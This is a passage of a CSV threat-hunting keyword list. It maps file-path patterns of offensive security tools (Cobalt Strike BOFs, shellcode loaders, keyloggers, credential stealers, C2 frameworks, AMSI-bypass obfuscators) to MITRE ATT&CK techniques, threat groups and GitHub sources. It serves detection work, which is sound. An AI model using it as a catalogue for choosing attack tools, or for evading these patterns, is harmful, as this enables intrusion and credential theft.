supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*/the-backdoor-factory.git*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/TheFatRat*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/theHarvester.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/theHarvester.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/ThemeBleed.exe*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*/thief.py*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*/thirdparty/msf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/ThisIsNotRat.git*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*/thoth.git*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/ThreadlessInject.git*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*/ThreatCheck.git*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*/ThunderDNS*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*/ticketConverter.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/ticketer.py -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*/ticketer.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*/ticketsplease.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*/TikiLoader/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/TikiSpawn/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*/timeoutpwn64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/timwr/CVE-2016-5195*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*/tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*/tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/tmp/amass.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/bin/csprecon*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/bin/subfinder*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/c2-rebind.so*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/dcow *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*/tmp/FavFreak/*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/geckodriver.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/gitleaks*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/host.ghost*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/tmp/mac.ghost*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/tmp/metadata/na.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*/tmp/metasploit_install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/tmp/p0f.log*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/scanrepo.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/truffleHog.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/TokenStealing*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*/TokenStripBOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/Tokenvator/*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*/tomcat-RH-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - 